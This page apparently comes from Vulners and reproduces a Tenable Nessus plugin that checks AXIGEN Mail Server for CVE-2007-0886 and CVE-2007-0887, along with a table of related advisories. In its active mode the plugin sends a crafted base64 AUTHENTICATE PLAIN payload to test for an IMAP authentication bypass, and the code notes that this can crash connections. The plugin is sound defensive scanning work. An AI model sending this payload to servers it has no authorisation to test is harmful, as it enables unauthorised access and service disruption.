Vulners
Lucene search
AXIGEN Mail Server < 2.0.0 Multiple Remote Vulnerabilities
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | AXIGEN Mail Server IMAP Server Multiple Authentication Methods DoS | 9 Feb 200700:00 | – | nessus |
 | CVE-2007-0886 | 12 Feb 200723:00 | – | cve |
| CVE-2007-0887 | 12 Feb 200723:00 | – | cve |
 | CVE-2007-0886 | 12 Feb 200723:00 | – | cvelist |
| CVE-2007-0887 | 12 Feb 200723:00 | – | cvelist |
 | CVE-2007-0886 | 12 Feb 200723:28 | – | nvd |
| CVE-2007-0887 | 12 Feb 200723:28 | – | nvd |
 | Integer overflow | 12 Feb 200723:28 | – | prion |
| Design/Logic Flaw | 12 Feb 200723:28 | – | prion |
 | Axigen Mail Server DoS | 8 Feb 200700:00 | – | securityvulns |
10
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(24321);
script_version("1.26");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2007-0886", "CVE-2007-0887");
script_bugtraq_id(22473, 22603);
script_xref(name:"EDB-ID", value:"3289");
script_xref(name:"EDB-ID", value:"3290");
script_xref(name:"EDB-ID", value:"3329");
script_name(english:"AXIGEN Mail Server < 2.0.0 Multiple Remote Vulnerabilities");
script_set_attribute(attribute:"synopsis", value:
"The remote mail server is affected by multiple vulnerabilities.");
script_set_attribute(attribute:"description", value:
"The remote host is running AXIGEN Mail Server, a messaging system for
Linux and BSD.
The POP3 server component of AXIGEN Mail Server contains a format
string vulnerability because it calls syslog() when logtypeis set to
'system'. In addition, the IMAP server component is affected by two
denial of service issues involving PLAIN and CRAM-MD5 authentication
methods. An unauthenticated, remote attacker can leverage these issues
to crash the IMAP service and possibly execute arbitrary code
remotely.");
script_set_attribute(attribute:"see_also", value:"http://www.axigen.com/forum/showthread.php?p=2386#post2386");
script_set_attribute(attribute:"solution", value:
"Upgrade to AXIGEN Mail Server version 2.0.0 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2007/02/08");
script_set_attribute(attribute:"plugin_publication_date", value:"2007/02/09");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:gecad:axigen_mail_server");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_MIXED_ATTACK);
script_family(english:"Gain a shell remotely");
script_copyright(english:"This script is Copyright (C) 2007-2022 Tenable Network Security, Inc.");
script_dependencies("find_service1.nasl");
script_require_ports("Services/imap", 143);
exit(0);
}
include("imap_func.inc");
include("misc_func.inc");
# Check the imap server.
port = get_service(svc:"imap", default: 143, exit_on_fail: 1);
if ( get_kb_item("imap/"+port+"/false_imap")
|| get_kb_item("imap/"+port+"/overflow")) exit(0);
# Make sure it's AXIGEN.
banner = get_imap_banner(port:port);
if (!banner || " AXIGEN " >!< banner)
exit(0, "The IMAP server on port "+port+" is not AXIGEN.");
# If safe checks are enabled...
if (safe_checks())
{
if (egrep(pattern:" AXIGEN ([0-1]\..*|2\.0.0-beta1) ", string:banner))
{
report = string(
"Nessus has determined the flaw exists with the application\n",
"based only on the version in the IMAP server's banner.\n"
);
security_hole(port:port, extra:report);
}
}
# Otherwise...
else
{
# Establish a connection.
tag = 0;
soc = open_sock_tcp(port);
if (! soc) exit(1, "Cannot connect to TCP port "+port+".");
# Read banner.
s = recv_line(socket:soc, length:1024);
if (strlen(s))
{
# Start to log in.
++tag;
c = string("nessus", string(tag), " AUTHENTICATE PLAIN");
send(socket:soc, data:string(c, "\r\n"));
s = recv_line(socket:soc, length:1024);
if ("+ data" >< s)
{
# Send the exploit to see if we can bypass authentication.
#
# nb: this will likely cause existing connections to be dropped.
c = base64(str:raw_string("*", 0));
send(socket:soc, data:string(c, "\r\n"));
s = recv_line(socket:soc, length:1024);
# There's a problem if we were able to authenticate.
if ("OK Done AUTHENTICATE" >< s) security_hole(port);
}
close(soc);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2022 00:00Current
6Medium risk
Vulners AI Score6
CVSS 210
EPSS0.26722